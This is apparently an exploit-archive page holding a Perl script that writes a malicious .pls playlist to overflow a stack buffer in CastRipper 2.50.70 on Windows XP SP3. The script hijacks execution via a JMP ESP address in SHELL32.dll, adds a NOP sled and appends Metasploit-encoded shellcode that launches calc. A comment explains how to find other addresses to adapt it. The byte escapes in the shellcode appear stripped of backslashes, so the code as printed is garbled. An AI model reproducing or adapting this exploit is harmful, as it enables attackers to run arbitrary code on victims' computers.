CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit WinXP SP3

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit WinXP SP3
# Published : 2009-12-24
# Author : d3b4g
# Previous Title : ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit
# Next Title : Radasm .rap file local buffer overflow vulnerability

#!/usr/bin/perl
# CastRipper 2.50.70 (.pls)Stack buffer Overflow Exploit WinXP SP3
# Exploite By : d3b4g
# my webpage www.d3b4g.info
# From tiny islands of maldivies
# Tested on Windows XP SP3 
# 24.12.2009
# I used Adress from SHELL32.dll.You can change it to your desired address.Use jmpfind.exe to find address.
print "CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploitn";
print "Exploit By : d3b4g";
my $file= "d3b4g.pls";
my $junk= "A" x 26076;
my $eip = pack('V',0x7D113B1F);  # JMP ESP from SHELL32.dll WinXP SP3
my $shellcode = "x90" x 25;     # NOPs

# windows/exec - 144 bytes
# Thanks to http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode . "xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1" .
"x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30" .
"x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa" .
"x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96" .
"x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b" .
"xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a" .
"xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83" .
"x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98" .
"xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61" .
"xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05" .
"x7fxe8x7bxca";

open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "pls File Created successfullyn";